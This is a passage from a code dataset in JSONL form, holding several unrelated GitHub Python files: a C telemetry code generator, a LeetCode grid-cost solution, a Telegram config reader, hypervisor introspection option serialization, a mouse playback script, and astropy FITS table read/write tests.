name.tv_sec + ((name.tv_nsec + time) / NS_IN_SEC);\\\\\\n'\r\n defines += ' nsec = (name.tv_nsec + time) % NS_IN_SEC;\\n\\n'\r\n return defines\r\n\r\ndef main_thread(tlm):\r\n # Begin writing send_tlm function\r\n main = 'void *send_tlm(void *args) {\\n'\r\n main += ' Telemetry tlm;\\n\\n'\r\n \r\n # Unpack thread arguments\r\n main += ' int socket = ((TelemetryArgs *)args)->socket;\\n'\r\n main += ' SA * dest_addr = ((TelemetryArgs *)args)->dest_addr;\\n'\r\n main += ' socklen_t dest_len = ((TelemetryArgs *)args)->dest_len;\\n\\n'\r\n \r\n main += current_time()\r\n \r\n # Create time structs for delays between tlm udpates\r\n time = 0\r\n total_ns = 1000000000 / tlm.config[\"packet_frequency\"]\r\n fns = CodeHeader.function_headers(tlm).splitlines()\r\n for i in range(0, len(fns)):\r\n numerator = int(re.sub('(?!_)\\D', '', fns[i]).split('_')[2])\r\n denominator = int(re.sub('(?!_)\\D', '', fns[i]).split('_')[3])\r\n \r\n delay = int((total_ns * numerator / denominator) - time);\r\n time = total_ns * numerator / denominator\r\n \r\n if i == 0:\r\n main += f' INIT_TIMES(now, {delay}L)\\n'\r\n else:\r\n main += f' INIT_TIMES(delay_{i}, {delay}L)\\n'\r\n main += f' struct timespec delay_{i+1} = {{sec, nsec}};\\n\\n'\r\n main += '\\n'\r\n \r\n # Open infinite loop to send telemetry\r\n main += ' while(1) {\\n'\r\n \r\n # Call update functions and send telemetry\r\n fns = CodeHeader.function_headers(tlm).splitlines()\r\n clk = 'CLOCK_MONOTONIC'\r\n for i in range(0, len(fns)):\r\n call = fns[i][5:].replace(\"Telemetry *\", \"&\")\r\n main += f' clock_nanosleep({clk}, TIMER_ABSTIME, &delay_{i+1}, NULL);\\n'\r\n main += f' {call}\\n\\n'\r\n \r\n main += ' if(sendto(socket, &tlm, PKT_LENGTH, 0, dest_addr, dest_len) == -1) {\\n'\r\n main += ' printf(\"%s\\\\n\", strerror(errno));\\n'\r\n main += ' //TODO: Comm Loss\\n'\r\n main += ' }\\n\\n'\r\n \r\n main += ' if(send_spacex(&tlm) == -1) {\\n'\r\n main += ' //TODO: Comm Loss\\n'\r\n main += ' }\\n\\n'\r\n \r\n for i in range(0, len(fns)):\r\n main += f' UPDATE_DELAY(delay_{i+1})\\n'\r\n \r\n main += ' }\\n}\\n\\n'\r\n \r\n return main\r\n\r\ndef current_time():\r\n return \"\"\" struct timespec now;\r\n if(clock_gettime(CLOCK_MONOTONIC, &now) == -1) {\r\n printf(\"clock_gettime() error: %s\\\\n\", strerror(errno));\r\n exit(-3);\r\n }\r\n __time_t sec = now.tv_sec;\r\n __syscall_slong_t nsec = now.tv_nsec;\\n\\n\"\"\"\r\n\r\ndef build_tlm(tlm):\r\n fns = CodeHeader.function_headers(tlm).splitlines()\r\n all_rates = tlm.get_all_rates()\r\n build_fns = ''\r\n \r\n # Get set of numeric rate divisions\r\n rates = set([int(x) for x in tlm.rates if valid_int(x)])\r\n \r\n for fn in fns:\r\n # Remove semicolon and open curly brace\r\n fn = fn[:-1] + ' {\\n'\r\n \r\n # Get fraction of current update function\r\n numerator = int(re.sub('(?!_)\\D', '', fn).split('_')[2])\r\n denominator = int(re.sub('(?!_)\\D', '', fn).split('_')[3])\r\n fn_frac = Fraction(numerator, denominator)\r\n \r\n # Determine which rates to update in this function\r\n update_list = []\r\n for r in rates:\r\n for i in range(1, r+1):\r\n frac = Fraction(i, r)\r\n if frac == fn_frac:\r\n update_list.append(r)\r\n \r\n # If fn_frac is 1, then update all parameters\r\n if fn_frac == 1:\r\n for item in tlm.get_all():\r\n fn += item.update_definition(False)\r\n else:\r\n for x in update_list:\r\n for item in all_rates[str(x)]:\r\n fn += item.update_definition(fn_frac)\r\n \r\n # Close curly brace\r\n fn += '}\\n\\n'\r\n \r\n build_fns += fn\r\n \r\n return build_fns\r\n\r\ndef valid_int(input):\r\n try:\r\n int(input)\r\n return True\r\n except:\r\n return False\r\n","repo_name":"umdloop/unnamed-pod","sub_path":"Telemetry_Framework/Python/CodeSource.py","file_name":"CodeSource.py","file_ext":"py","file_size_in_byte":6325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72862269494","text":"# There is an m x n grid, where (0, 0) is the top-left cell and (m - 1, n - 1) is the bottom-right cell. You are given an integer array startPos where startPos = [startrow, startcol] indicates that initially, a robot is at the cell (startrow, startcol). You are also given an integer array homePos where homePos = [homerow, homecol] indicates that its home is at the cell (homerow, homecol).\n\n# The robot needs to go to its home. It can move one cell in four directions: left, right, up, or down, and it can not move outside the boundary. Every move incurs some cost. You are further given two 0-indexed integer arrays: rowCosts of length m and colCosts of length n.\n\n# If the robot moves up or down into a cell whose row is r, then this move costs rowCosts[r].\n# If the robot moves left or right into a cell whose column is c, then this move costs colCosts[c].\n\n# Return the minimum total cost for this robot to return home.\n\n# Could be more efficiently implemented by doing some basic row / column math but this\n# is just a straighforward method\n\nclass Solution:\n def minCost(self, startPos: List[int], homePos: List[int], rowCosts: List[int], colCosts: List[int]) -> int:\n total = 0\n \n row,col = startPos[0], startPos[1]\n if row < homePos[0]:\n while row<homePos[0]:\n row += 1\n total += rowCosts[row]\n elif row > homePos[0]:\n while row > homePos[0]:\n row -= 1\n total += rowCosts[row]\n \n if col > homePos[1]:\n while col > homePos[1]:\n col -= 1\n total += colCosts[col]\n elif col < homePos[1]:\n while col < homePos[1]:\n col += 1\n total += colCosts[col]\n return total\n\n# Time complexity is O(N + M) as in the worst case we need to traverse the grid from corner to corner \n\n# Space complexity is O(1)","repo_name":"conor47/Algorithm-Patterns","sub_path":"General Problems/DynamicProgramming/minimumCostHomecomingOfRobitInGrid.py","file_name":"minimumCostHomecomingOfRobitInGrid.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74063053494","text":"from abc import ABC, abstractmethod\nfrom json import dump, load\nfrom dataclasses import dataclass\nfrom typing import Optional, Union, Dict\nfrom pathlib import Path\n\n\n@dataclass\nclass TelegramAppInfo(ABC):\n\n \"\"\"Structure that stores app info\"\"\"\n\n _id: Optional[str] = None\n _hash: Optional[str] = None\n session: str = \"session\"\n\n @abstractmethod\n def read_config(self, conf: Optional[Union[Path, str, Dict[str, str]]]) -> None:\n pass\n\n @property\n def api_id(self):\n if not self._id:\n raise ConfigNotRead()\n return self._id\n\n @property\n def api_hash(self):\n if not self._hash:\n raise ConfigNotRead()\n return self._hash\n\n\nclass ConfigNotRead(Exception):\n\n message = \"Configuration file was not read!\"\n\n\n@dataclass\nclass TelegramAppInfoFromJson(TelegramAppInfo):\n\n \"\"\"TelegramAppInfo implementation that receives path to json config as argument\"\"\"\n\n def read_config(self, conf=\"tg_id_and_hash.json\") -> None:\n try:\n with open(conf) as file:\n conf_info = load(file)\n self._id = conf_info[\"api_id\"]\n self._hash = conf_info[\"api_hash\"]\n except KeyError as e:\n raise Exception(f\"api id or api hash not in configuration file with path: {conf}\")\n except FileNotFoundError as e:\n raise Exception(f\"No configuration file with path: {conf}\")\n","repo_name":"blueflyingpanda/tg_parser_with_scheduler","sub_path":"tg_app_info.py","file_name":"tg_app_info.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34197738967","text":"import yaml\nimport struct\nimport os\nimport crc32\nimport intro_defines\nfrom objects import CamiYAMLObject, CamiObject, CamiDataTable, CamiAtom, FilePointerException, get_all_objects\n\noptions = {}\n\nknown_encodings = [\"utf-8\", \"utf-16\"]\n\n\nclass GlobalIntrocoreOptions(CamiYAMLObject):\n yaml_tag = u'!global_introcore_options'\n\n def post_create(self, state):\n if \"globals\" in options:\n raise Exception(\"Global options already loaded\")\n options[\"globals\"] = {}\n options[\"globals\"].update(state)\n\n\nclass ProcessOptions(CamiYAMLObject, CamiAtom):\n \"\"\"\n\ttypedef struct _CAMI_PROC_PROT_OPTIONS\n\t{\n\t\tunion\n\t\t{\n\t\t\tWCHAR Name16[32];\n\t\t\tCHAR Name8[64];\n\t\t}\n\t\tDWORD OptionsOffset;\n\t\tDWORD Flags;\n\n\t\tQWORD _Reserved1;\n\t\tDWORD _Reserved2;\n\t\tDWORD _Reserved3;\n\n\t} CAMI_PROC_PROT_OPTIONS;\n\t\"\"\"\n\n yaml_tag = \"!process_options\"\n\n descriptor_layout = \"<64sIIQII\"\n\n encoding = \"utf-8\"\n\n def __eq__(self, other):\n if type(self) != type(other):\n raise Exception(\"Unsupported comparison between {} and {}\".format(type(self), type(other)))\n return self.__dict__ == other.__dict__\n\n def get_descriptor(self):\n if self.encoding not in known_encodings:\n raise Exception(\"Invalid encoding: {}\".format(encoding))\n\n flags = 0\n skip = 0\n\n if self.encoding == \"utf-16\":\n flags |= intro_defines.process_options_flags[\"name_utf16\"]\n skip = 2\n\n return struct.pack(\n self.descriptor_layout,\n bytes(self.name, self.encoding)[skip:],\n self.options.get_file_pointer(),\n flags,\n 0,\n 0,\n 0,\n )\n\n def serialize(self, start):\n return self.options.serialize(start)\n\n def __repr__(self):\n return self.name + \", \" + repr(self.options)\n\n\nclass ProcessOptionsList(CamiDataTable):\n entry_type = ProcessOptions\n\n\nclass Options:\n def __init__(self):\n self.core_options = IntrocoreOptions()\n self.shemu_options = IntrocoreOptions()\n self.proc_options = ProcessOptionsList()\n\n def apply(self, other):\n self.core_options.apply(other.core_options)\n self.shemu_options.apply(other.shemu_options)\n for opt_to_apply in other.proc_options.get_entries():\n found = False\n\n for opt in self.proc_options.get_entries():\n if opt.name == opt_to_apply.name:\n opt.options.apply(opt_to_apply.options)\n found = True\n\n if not found:\n self.proc_options.add_entry(opt_to_apply)\n\n\nclass GlobalOptions(Options, CamiYAMLObject):\n yaml_tag = \"!global_options\"\n\n def post_create(self, state):\n self.proc_options = ProcessOptionsList()\n self.proc_options.set_entries(state[\"proc_options\"])\n\n def __eq__(self, other):\n if type(self) != type(other):\n raise Exception(\"Unsupported comparison between {} and {}\".format(type(self), type(other)))\n return self.__dict__ == other.__dict__\n\n\nclass OsOptions(Options, CamiYAMLObject, CamiObject):\n yaml_tag = \"!os_options\"\n \"\"\"\n typedef struct _CAMI_CUSTOM_OS_PROTECTION\n {\n DWORD CoreOptionsOffset; // Intro core options. Filepointer to a CAMI_PROT_OPTIONS structure\n DWORD ProcOptionsCount; // Proc options count\n DWORD ProcOptionsTable; // Process protection options. Pointer to a CAMI_PROC_PROT_OPTIONS[] array\n DWORD ShemuOptions; // Shemu options. Filepointer to a CAMI_PROT_OPTIONS structure\n QWORD _Reserved2;\n } CAMI_CUSTOM_OS_PROTECTION;\n \"\"\"\n descriptor_layout = \"<IIIIQ\"\n\n def __init__(self, other):\n self.core_options = other.core_options\n self.proc_options = other.proc_options\n self.shemu_options = other.shemu_options\n self.version = None\n self.os_type = None\n\n def post_create(self, state):\n self.proc_options = ProcessOptionsList()\n self.proc_options.set_entries(state[\"proc_options\"])\n\n def get_binary_size(self):\n return struct.calcsize(self.descriptor_layout)\n\n def get_binary(self):\n return struct.pack(\n self.descriptor_layout,\n self.core_options.get_file_pointer(),\n self.proc_options.get_entry_count(),\n self.proc_options.get_file_pointer(),\n self.shemu_options.get_file_pointer(),\n 0,\n )\n\n def serialize(self, start):\n try:\n self.set_file_pointer(start)\n data = self.core_options.serialize(start + self.get_binary_size())\n data += self.proc_options.serialize(start + self.get_binary_size() + len(data))\n data += self.shemu_options.serialize(start + self.get_binary_size() + len(data))\n return self.get_binary() + data\n except FilePointerException:\n return bytes()\n\n def __repr__(self):\n return \"Core: \" + repr(self.core_options) + \" Process: \" + repr(self.proc_options) + \\\n \" Shemu: \" + repr(self.shemu_options)\n\n\nclass IntrocoreOptions(CamiYAMLObject, CamiObject):\n yaml_tag = \"!options_control\"\n \"\"\"\n typedef struct _CAMI_PROT_OPTIONS\n {\n QWORD ForceOff; // Options which will be disabled\n QWORD ForceBeta; // Options beta only\n QWORD ForceFeedback; // Options feedback only\n QWORD ForceOn; // Options which will be enabled by default\n DWORD _Reserved2;\n DWORD _Reserved3;\n } CAMI_PROT_OPTIONS;\n \"\"\"\n\n descriptor_layout = \"<QQQQII\"\n\n def __init__(self):\n self.force_off = 0\n self.force_beta = 0\n self.force_feedback = 0\n self.force_on = 0\n\n def get_options_value(self, opts_list):\n opts = 0\n\n for opt in opts_list:\n opts |= intro_defines.intro_options[opt]\n\n return opts\n\n def post_create(self, state):\n self.force_off = self.get_options_value(self.force_off)\n self.force_beta = self.get_options_value(self.force_beta)\n self.force_feedback = self.get_options_value(self.force_feedback)\n self.force_on = self.get_options_value(self.force_on)\n\n def __eq__(self, other):\n if type(self) != type(other):\n raise Exception(\"Unsupported comparison between {} and {}\".format(type(self), type(other)))\n\n return self.__dict__ == other.__dict__\n\n def __repr__(self):\n return \"off: 0x%lx beta: 0x%lx feedback: 0x%lx on: 0x%lx\" % (\n self.force_off,\n self.force_beta,\n self.force_feedback,\n self.force_on,\n )\n\n def apply(self, other):\n self.force_off |= other.force_off\n self.force_beta |= other.force_beta\n self.force_feedback |= other.force_feedback\n self.force_on |= other.force_on\n\n def get_binary(self):\n # if you add any other fields make sure you update the if statement in serialize\n return struct.pack(\n self.descriptor_layout, self.force_off, self.force_beta, self.force_feedback, self.force_on, 0, 0,\n )\n\n def serialize(self, start):\n try:\n self.set_file_pointer(start)\n\n return self.get_binary()\n\n except FilePointerException:\n pass\n\n return bytes()\n\n\ndef apply_globals():\n global options\n\n # first apply global intro options to os type specific options\n options[\"globals\"][\"linux\"].apply(options[\"globals\"][\"common\"])\n options[\"globals\"][\"windows\"].apply(options[\"globals\"][\"common\"])\n\n # then apply the os type specific options to each os\n for os_options in options[\"per_os\"]:\n os_options.apply(options[\"globals\"][os_options.os_type])\n\n\ndef create_global_defaults():\n global options\n if \"globals\" in options:\n # global options are loaded. no need to create defaults\n return\n\n options[\"globals\"] = {}\n options[\"globals\"][\"common\"] = GlobalOptions()\n options[\"globals\"][\"linux\"] = GlobalOptions()\n options[\"globals\"][\"windows\"] = GlobalOptions()\n\n\ndef create_defaults():\n global options\n\n options[\"default\"] = {}\n options[\"default\"][\"linux\"] = OsOptions(options[\"globals\"][\"linux\"])\n\n if options[\"globals\"][\"linux\"] == options[\"globals\"][\"windows\"]:\n options[\"default\"][\"windows\"] = options[\"default\"][\"linux\"]\n\n else:\n options[\"default\"][\"windows\"] = OsOptions(options[\"globals\"][\"windows\"])\n\n\ndef create_per_os_options_list():\n global options\n\n options[\"per_os\"] = []\n\n try:\n options[\"per_os\"].extend(get_all_objects(OsOptions))\n except KeyError:\n # This is fine. It means no custom options have been set (or at least loaded).\n pass\n\n\ndef get_options_for_os_version(version):\n global options\n\n if options is None:\n raise Exception(\"Intro options not loaded!\")\n\n for os_options in options[\"per_os\"]:\n if os_options.version == version:\n return os_options\n\n if type(version) is str:\n return options[\"default\"][\"linux\"]\n\n elif type(version) is tuple:\n return options[\"default\"][\"windows\"]\n\n raise Exception(\"Unknown os type for version {} ({})\".format(version, type(version)))\n\n\ndef craft_options():\n create_global_defaults()\n\n create_per_os_options_list()\n\n apply_globals()\n\n create_defaults()\n","repo_name":"bitdefender/hvmi","sub_path":"cami/scripts/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":9385,"program_lang":"python","lang":"en","doc_type":"code","stars":601,"dataset":"github-code","pt":"21"} +{"seq_id":"39973933102","text":"import pickle\nimport mouse\n\n\nclass MouseModulePlayback:\n def __init__(self, data) -> None:\n self.data = data\n\n\n def play(self, speed_factor=1.0) -> None:\n if not self.data:\n raise RuntimeError(\"`data` cannot be None\")\n if \"events\" not in self.data:\n raise RuntimeError(\"`data['events']` cannot be None\")\n\n mouse.play(self.data[\"events\"], speed_factor=speed_factor)\n mouse.unhook_all()\n\n\ndef main():\n with open(\"recording_1.zvt\", \"rb\") as f:\n data = pickle.load(f)\n playback = MouseModulePlayback(data)\n playback.play(3.0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AutomationSolutionz/Zeuz_Python_Node","sub_path":"Framework/Built_In_Automation/Desktop/RecordPlayback/MouseModulePlayback.py","file_name":"MouseModulePlayback.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"18588443691","text":"import gc\nimport warnings\n\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_allclose, assert_array_equal\n\nfrom astropy import units as u\nfrom astropy.io import fits\nfrom astropy.io.fits import (\n BinTableHDU,\n HDUList,\n ImageHDU,\n PrimaryHDU,\n connect,\n table_to_hdu,\n)\nfrom astropy.io.fits.column import (\n _fortran_to_python_format,\n _parse_tdisp_format,\n python_to_tdisp,\n)\nfrom astropy.io.tests.mixin_columns import compare_attrs, mixin_cols, serialized_names\nfrom astropy.table import Column, MaskedColumn, QTable, Table\nfrom astropy.table.table_helpers import simple_table\nfrom astropy.time import Time\nfrom astropy.units import allclose as quantity_allclose\nfrom astropy.units.format.fits import UnitScaleError\nfrom astropy.units.quantity import QuantityInfo\nfrom astropy.utils.data import get_pkg_data_filename\nfrom astropy.utils.exceptions import AstropyDeprecationWarning, AstropyUserWarning\nfrom astropy.utils.misc import _NOT_OVERWRITING_MSG_MATCH\n\n# FITS does not preserve precision, in_subfmt, and out_subfmt.\ntime_attrs = [\"value\", \"shape\", \"format\", \"scale\", \"location\"]\ncompare_attrs = {\n name: (time_attrs if isinstance(col, Time) else compare_attrs[name])\n for name, col in mixin_cols.items()\n}\n# FITS does not support multi-element location, array with object dtype,\n# or logarithmic quantities.\nunsupported_cols = {\n name: col\n for name, col in mixin_cols.items()\n if (\n isinstance(col, Time)\n and col.location.shape != ()\n or isinstance(col, np.ndarray)\n and col.dtype.kind == \"O\"\n or isinstance(col, u.LogQuantity)\n )\n}\nmixin_cols = {\n name: col for name, col in mixin_cols.items() if name not in unsupported_cols\n}\n\n\ndef equal_data(a, b):\n return all(np.all(a[name] == b[name]) for name in a.dtype.names)\n\n\nclass TestSingleTable:\n def setup_class(self):\n self.data = np.array(\n list(zip([1, 2, 3, 4], [\"a\", \"b\", \"c\", \"d\"], [2.3, 4.5, 6.7, 8.9])),\n dtype=[(\"a\", int), (\"b\", \"U1\"), (\"c\", float)],\n )\n\n def test_simple(self, tmp_path):\n filename = tmp_path / \"test_simple.fts\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n\n def test_simple_pathlib(self, tmp_path):\n filename = tmp_path / \"test_simple.fit\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n\n def test_simple_meta(self, tmp_path):\n filename = tmp_path / \"test_simple.fits\"\n t1 = Table(self.data)\n t1.meta[\"A\"] = 1\n t1.meta[\"B\"] = 2.3\n t1.meta[\"C\"] = \"spam\"\n t1.meta[\"comments\"] = [\"this\", \"is\", \"a\", \"long\", \"comment\"]\n t1.meta[\"HISTORY\"] = [\"first\", \"second\", \"third\"]\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n for key in t1.meta:\n if isinstance(t1.meta, list):\n for i in range(len(t1.meta[key])):\n assert t1.meta[key][i] == t2.meta[key][i]\n else:\n assert t1.meta[key] == t2.meta[key]\n\n def test_simple_meta_conflicting(self, tmp_path):\n filename = tmp_path / \"test_simple.fits\"\n t1 = Table(self.data)\n t1.meta[\"ttype1\"] = \"spam\"\n with pytest.warns(\n AstropyUserWarning,\n match=(\n \"Meta-data keyword ttype1 \"\n \"will be ignored since it conflicts with a FITS \"\n \"reserved keyword\"\n ),\n ) as w:\n t1.write(filename, overwrite=True)\n assert len(w) == 1\n\n def test_simple_noextension(self, tmp_path):\n \"\"\"\n Test that file type is recognized without extension\n \"\"\"\n filename = tmp_path / \"test_simple\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True, format=\"fits\")\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n\n @pytest.mark.parametrize(\"table_type\", (Table, QTable))\n def test_with_units(self, table_type, tmp_path):\n filename = tmp_path / \"test_with_units.fits\"\n t1 = table_type(self.data)\n t1[\"a\"].unit = u.m\n t1[\"c\"].unit = u.km / u.s\n t1.write(filename, overwrite=True)\n t2 = table_type.read(filename)\n assert equal_data(t1, t2)\n assert t2[\"a\"].unit == u.m\n assert t2[\"c\"].unit == u.km / u.s\n\n def test_with_custom_units_qtable(self, tmp_path):\n # Test only for QTable - for Table's Column, new units are dropped\n # (as is checked in test_write_drop_nonstandard_units).\n filename = tmp_path / \"test_with_units.fits\"\n unit = u.def_unit(\"bandpass_sol_lum\")\n t = QTable()\n t[\"l\"] = np.ones(5) * unit\n with pytest.warns(AstropyUserWarning) as w:\n t.write(filename, overwrite=True)\n assert len(w) == 1\n assert \"bandpass_sol_lum\" in str(w[0].message)\n # Just reading back, the data is fine but the unit is not recognized.\n with pytest.warns(\n u.UnitsWarning, match=\"'bandpass_sol_lum' did not parse\"\n ) as w:\n t2 = QTable.read(filename)\n assert len(w) == 1\n assert isinstance(t2[\"l\"].unit, u.UnrecognizedUnit)\n assert str(t2[\"l\"].unit) == \"bandpass_sol_lum\"\n assert np.all(t2[\"l\"].value == t[\"l\"].value)\n\n # But if we enable the unit, it should be recognized.\n with u.add_enabled_units(unit):\n t3 = QTable.read(filename)\n assert t3[\"l\"].unit is unit\n assert equal_data(t3, t)\n\n # Regression check for #8897; write used to fail when a custom\n # unit was enabled.\n with pytest.warns(AstropyUserWarning):\n t3.write(filename, overwrite=True)\n\n # It should also be possible to read the file in using a unit alias,\n # even to a unit that may not be the same.\n with u.set_enabled_aliases({\"bandpass_sol_lum\": u.Lsun}):\n t3 = QTable.read(filename)\n assert t3[\"l\"].unit is u.Lsun\n\n @pytest.mark.parametrize(\"table_type\", (Table, QTable))\n def test_read_with_unit_aliases(self, table_type):\n hdu = BinTableHDU(self.data)\n hdu.columns[0].unit = \"Angstroms\"\n hdu.columns[2].unit = \"ergs/(cm.s.Angstroms)\"\n with u.set_enabled_aliases({\"Angstroms\": u.AA, \"ergs\": u.erg}):\n t = table_type.read(hdu)\n assert t[\"a\"].unit == u.AA\n assert t[\"c\"].unit == u.erg / (u.cm * u.s * u.AA)\n\n @pytest.mark.parametrize(\"table_type\", (Table, QTable))\n def test_with_format(self, table_type, tmp_path):\n filename = tmp_path / \"test_with_format.fits\"\n t1 = table_type(self.data)\n t1[\"a\"].format = \"{:5d}\"\n t1[\"b\"].format = \"{:>20}\"\n t1[\"c\"].format = \"{:6.2f}\"\n t1.write(filename, overwrite=True)\n t2 = table_type.read(filename)\n assert equal_data(t1, t2)\n assert t2[\"a\"].format == \"{:5d}\"\n assert t2[\"b\"].format == \"{:>20}\"\n assert t2[\"c\"].format == \"{:6.2f}\"\n\n def test_masked(self, tmp_path):\n filename = tmp_path / \"test_masked.fits\"\n t1 = Table(self.data, masked=True)\n t1.mask[\"a\"] = [1, 0, 1, 0]\n t1.mask[\"b\"] = [1, 0, 0, 1]\n t1.mask[\"c\"] = [0, 1, 1, 0]\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n assert np.all(t1[\"a\"].mask == t2[\"a\"].mask)\n assert np.all(t1[\"b\"].mask == t2[\"b\"].mask)\n assert np.all(t1[\"c\"].mask == t2[\"c\"].mask)\n\n @pytest.mark.parametrize(\"masked\", [True, False])\n def test_masked_nan(self, masked, tmp_path):\n \"\"\"Check that masked values by default are replaced by NaN.\n\n This should work for any shape and be independent of whether the\n Table is formally masked or not.\n\n \"\"\"\n filename = tmp_path / \"test_masked_nan.fits\"\n a = np.ma.MaskedArray([5.25, 8.5, 3.75, 6.25], mask=[1, 0, 1, 0])\n b = np.ma.MaskedArray([2.5, 4.5, 6.75, 8.875], mask=[1, 0, 0, 1], dtype=\"f4\")\n c = np.ma.stack([a, b], axis=-1)\n t1 = Table([a, b, c], names=[\"a\", \"b\", \"c\"], masked=masked)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert_array_equal(t2[\"a\"].data, [np.nan, 8.5, np.nan, 6.25])\n assert_array_equal(t2[\"b\"].data, [np.nan, 4.5, 6.75, np.nan])\n assert_array_equal(\n t2[\"c\"].data, np.stack([t2[\"a\"].data, t2[\"b\"].data], axis=-1)\n )\n assert np.all(t1[\"a\"].mask == t2[\"a\"].mask)\n assert np.all(t1[\"b\"].mask == t2[\"b\"].mask)\n assert np.all(t1[\"c\"].mask == t2[\"c\"].mask)\n\n def test_masked_serialize_data_mask(self, tmp_path):\n filename = tmp_path / \"test_masked_nan.fits\"\n a = np.ma.MaskedArray([5.25, 8.5, 3.75, 6.25], mask=[1, 0, 1, 0])\n b = np.ma.MaskedArray([2.5, 4.5, 6.75, 8.875], mask=[1, 0, 0, 1])\n c = np.ma.stack([a, b], axis=-1)\n t1 = Table([a, b, c], names=[\"a\", \"b\", \"c\"])\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert_array_equal(t2[\"a\"].data, [5.25, 8.5, 3.75, 6.25])\n assert_array_equal(t2[\"b\"].data, [2.5, 4.5, 6.75, 8.875])\n assert_array_equal(\n t2[\"c\"].data, np.stack([t2[\"a\"].data, t2[\"b\"].data], axis=-1)\n )\n assert np.all(t1[\"a\"].mask == t2[\"a\"].mask)\n assert np.all(t1[\"b\"].mask == t2[\"b\"].mask)\n assert np.all(t1[\"c\"].mask == t2[\"c\"].mask)\n\n def test_read_from_fileobj(self, tmp_path):\n filename = tmp_path / \"test_read_from_fileobj.fits\"\n hdu = BinTableHDU(self.data)\n hdu.writeto(filename, overwrite=True)\n with open(filename, \"rb\") as f:\n t = Table.read(f)\n assert equal_data(t, self.data)\n\n def test_read_with_nonstandard_units(self):\n hdu = BinTableHDU(self.data)\n hdu.columns[0].unit = \"RADIANS\"\n hdu.columns[1].unit = \"spam\"\n hdu.columns[2].unit = \"millieggs\"\n with pytest.warns(u.UnitsWarning, match=\"did not parse as fits unit\"):\n t = Table.read(hdu)\n assert equal_data(t, self.data)\n\n @pytest.mark.parametrize(\"table_type\", (Table, QTable))\n def test_write_drop_nonstandard_units(self, table_type, tmp_path):\n # While we are generous on input (see above), we are strict on\n # output, dropping units not recognized by the fits standard.\n filename = tmp_path / \"test_nonstandard_units.fits\"\n spam = u.def_unit(\"spam\")\n t = table_type()\n t[\"a\"] = [1.0, 2.0, 3.0] * spam\n with pytest.warns(AstropyUserWarning, match=\"spam\") as w:\n t.write(filename)\n assert len(w) == 1\n if table_type is Table:\n assert \"cannot be recovered in reading. \" in str(w[0].message)\n else:\n assert \"lost to non-astropy fits readers\" in str(w[0].message)\n\n with fits.open(filename) as ff:\n hdu = ff[1]\n assert \"TUNIT1\" not in hdu.header\n\n def test_memmap(self, tmp_path):\n filename = tmp_path / \"test_simple.fts\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename, memmap=False)\n t3 = Table.read(filename, memmap=True)\n assert equal_data(t2, t3)\n # To avoid issues with open files, we need to remove references to\n # data that uses memory mapping and force the garbage collection\n del t1, t2, t3\n gc.collect()\n\n @pytest.mark.parametrize(\"memmap\", (False, True))\n def test_character_as_bytes(self, tmp_path, memmap):\n filename = tmp_path / \"test_simple.fts\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename, character_as_bytes=False, memmap=memmap)\n t3 = Table.read(filename, character_as_bytes=True, memmap=memmap)\n assert t2[\"b\"].dtype.kind == \"U\"\n assert t3[\"b\"].dtype.kind == \"S\"\n assert equal_data(t2, t3)\n # To avoid issues with open files, we need to remove references to\n # data that uses memory mapping and force the garbage collection\n del t1, t2, t3\n gc.collect()\n\n def test_oned_single_element(self, tmp_path):\n filename = tmp_path / \"test_oned_single_element.fits\"\n table = Table({\"x\": [[1], [2]]})\n table.write(filename, overwrite=True)\n\n read = Table.read(filename)\n assert read[\"x\"].shape == (2, 1)\n assert len(read[\"x\"][0]) == 1\n\n def test_write_append(self, tmp_path):\n t = Table(self.data)\n hdu = table_to_hdu(t)\n\n def check_equal(filename, expected, start_from=1):\n with fits.open(filename) as hdu_list:\n assert len(hdu_list) == expected\n for hdu_table in hdu_list[start_from:]:\n assert hdu_table.header == hdu.header\n assert np.all(hdu_table.data == hdu.data)\n\n filename = tmp_path / \"test_write_append.fits\"\n t.write(filename, append=True)\n t.write(filename, append=True)\n check_equal(filename, 3)\n\n # Check the overwrite works correctly.\n t.write(filename, append=True, overwrite=True)\n t.write(filename, append=True)\n check_equal(filename, 3)\n\n # Normal write, check it's not appending.\n t.write(filename, overwrite=True)\n t.write(filename, overwrite=True)\n check_equal(filename, 2)\n\n # Now write followed by append, with different shaped tables.\n t2 = Table(np.array([1, 2]))\n t2.write(filename, overwrite=True)\n t.write(filename, append=True)\n check_equal(filename, 3, start_from=2)\n assert equal_data(t2, Table.read(filename, hdu=1))\n\n def test_write_overwrite(self, tmp_path):\n t = Table(self.data)\n filename = tmp_path / \"test_write_overwrite.fits\"\n t.write(filename)\n with pytest.raises(OSError, match=_NOT_OVERWRITING_MSG_MATCH):\n t.write(filename)\n t.write(filename, overwrite=True)\n\n def test_mask_nans_on_read(self, tmp_path):\n filename = tmp_path / \"test_inexact_format_parse_on_read.fits\"\n c1 = fits.Column(name=\"a\", array=np.array([1, 2, np.nan]), format=\"E\")\n table_hdu = fits.TableHDU.from_columns([c1])\n table_hdu.writeto(filename)\n\n tab = Table.read(filename)\n assert any(tab.mask)\n assert tab.mask[2]\n\n tab = Table.read(filename, 